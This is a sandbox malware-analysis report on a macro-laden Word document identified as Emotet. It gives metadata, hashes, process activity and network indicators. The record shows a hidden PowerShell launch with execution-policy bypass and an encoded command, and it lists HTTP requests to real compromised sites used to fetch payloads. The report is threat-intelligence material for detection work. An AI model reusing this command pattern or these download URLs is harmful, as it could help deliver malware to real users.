File name: 7b552940dadba3f8f8011b0ed9d672cac4a94834b4be35713cec144bc2bf2015

Full analysis: https://app.any.run/tasks/03035da8-d230-4c6f-907d-b6174d9b6b26
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: May 20, 2019, 13:40:49
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, opendir, emotet-doc, emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Licensed, Subject: ADP, Author: Oma Gleichner, Comments: 1080p, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon May 20 08:57:00 2019, Last Saved Time/Date: Mon May 20 08:57:00 2019, Number of Pages: 1, Number of Words: 10, Number of Characters: 62, Security: 0
MD5: E36B1F21F99BC29C9E703CC1695AA25C
SHA1: 38DC5E95F3A5715F2319CCD7C74470D219F060EB
SHA256: 7B552940DADBA3F8F8011B0ED9D672CAC4A94834B4BE35713CEC144BC2BF2015
SSDEEP: 3072:r077HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qfW22snSs/6+epLrGF:I77HUUUUUUUUUUUUUUUUUUUT52VMW22E

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3076)
    • Creates files in the user directory

      • powershell.exe (PID: 3076)
    • PowerShell script executed

      • powershell.exe (PID: 3076)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3320)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3320)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3076)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: Licensed
Subject: ADP
Author: Oma Gleichner
Keywords: -
Comments: 1080p
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:20 07:57:00
ModifyDate: 2019:05:20 07:57:00
Pages: 1
Words: 10
Characters: 62
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Bins - Shields
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 71
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Hamill
No data.
All screenshots are available in the full report
Total processes: 36
Monitored processes: 2
Malicious processes: 0
Suspicious processes: 1

Behavior graph (process details are in the full report)

start -> winword.exe (no specs) -> powershell.exe

Process information

PID | CMD | Path | Indicators | Parent process
3320 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\7b552940dadba3f8f8011b0ed9d672cac4a94834b4be35713cec144bc2bf2015.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | - | explorer.exe
  • User: admin
  • Company: Microsoft Corporation
  • Integrity Level: MEDIUM
  • Description: Microsoft Word
  • Version: 14.0.6024.1000
3076 | powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e [encoded command removed] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | - | wmiprvse.exe
  • User: admin
  • Company: Microsoft Corporation
  • Integrity Level: MEDIUM
  • Description: Windows PowerShell
  • Exit code: 0
  • Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 1 361
Read events: 888
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 2
Text files: 0
Unknown types: 7

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRED7A.tmp.cvr | - | - | -
3076 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U73E0OQ4HKMZITD35O7V.temp | - | - | -
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$552940dadba3f8f8011b0ed9d672cac4a94834b4be35713cec144bc2bf2015.doc | pgc | C6F8FB8693BD40105F309D0B44C78452 | 92B8DDAF70527B3962A0EC4387C92C04EA258D829D3CF60C02B1B71C195ED0A4
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E1E6ACC.wmf | wmf | 02BBC7D518EEE6BA7D6A88446AE37236 | E30F4B5C13F7504F6A4BD48397C2FFA852D084644FFBF281F82B068E084FB3A7
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 4BF5A50E356FEA8443684DFD8BDDDD55 | 4A89E064F7D3F536E48922AE122F77D103863507B013776598817E44666711EA
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A311078E.wmf | wmf | 12749EE7DA290892EEE06700CF24DA98 | 40481E7A1708403333B431446E2801482DF48F5E18925AAB00415A8F42A1CF54
3320 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 17222E7BED955763CB75EBDA153E0074 | EAEB163582F92B56C14963150DA7DBEA34565552F3D187A793BE19BEB0978882
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CDBDF637.wmf | wmf | FD4AA3E9073331C95BF889378F69671C | 59388D1F167727981FD92D5EE729B4B2C8186E1209F6BCD7364AF49F2F53660A
3076 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11fc3f.TMP | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E404B45D.wmf | wmf | BCDCCEF8DE072414627126839CDD47D0 | F42DE952A9BF5DD578E5EF914FAA342EC4302DBE485C31A7BDFF7E34BE66F8E7
HTTP(S) requests: 4
TCP/UDP connections: 5
DNS requests: 6
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3076 | powershell.exe | GET | 404 | 171.22.26.29:80 | http://saminprinter.com/wp-includes/yrkvm4vyy_ybidb-43745207/ | GB | xml | 345 b | suspicious
3076 | powershell.exe | GET | 404 | 192.99.62.163:80 | http://santuarioaparecidamontese.com.br/wp-includes/7jn9p7_qou49bjodx-33953/ | CA | xml | 345 b | suspicious
3076 | powershell.exe | GET | 404 | 199.250.205.232:80 | http://aworldtourism.com/wp-includes/1fcjc8_m4lnj7ffng-755100/ | US | xml | 345 b | malicious
3076 | powershell.exe | GET | 404 | 54.38.130.145:80 | http://serwiskonsol.com/wp-content/JEsfYuiPMv/ | FR | xml | 345 b | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3076 | powershell.exe | 192.99.62.163:80 | santuarioaparecidamontese.com.br | OVH SAS | CA | unknown
3076 | powershell.exe | 171.22.26.29:80 | saminprinter.com | - | GB | suspicious
3076 | powershell.exe | 54.38.130.145:80 | serwiskonsol.com | OVH SAS | FR | unknown
3076 | powershell.exe | 104.27.179.199:443 | ppdiamonds.co | Cloudflare Inc | US | shared
3076 | powershell.exe | 199.250.205.232:80 | aworldtourism.com | - | US | unknown

DNS requests

Domain | IP | Reputation
saminprinter.com | 171.22.26.29 | suspicious
santuarioaparecidamontese.com.br | 192.99.62.163 | suspicious
serwiskonsol.com | 54.38.130.145 | unknown
ppdiamonds.co | 104.27.179.199, 104.27.178.199 | suspicious
aworldtourism.com | 199.250.205.232 | malicious

Threats

No threats detected
No debug info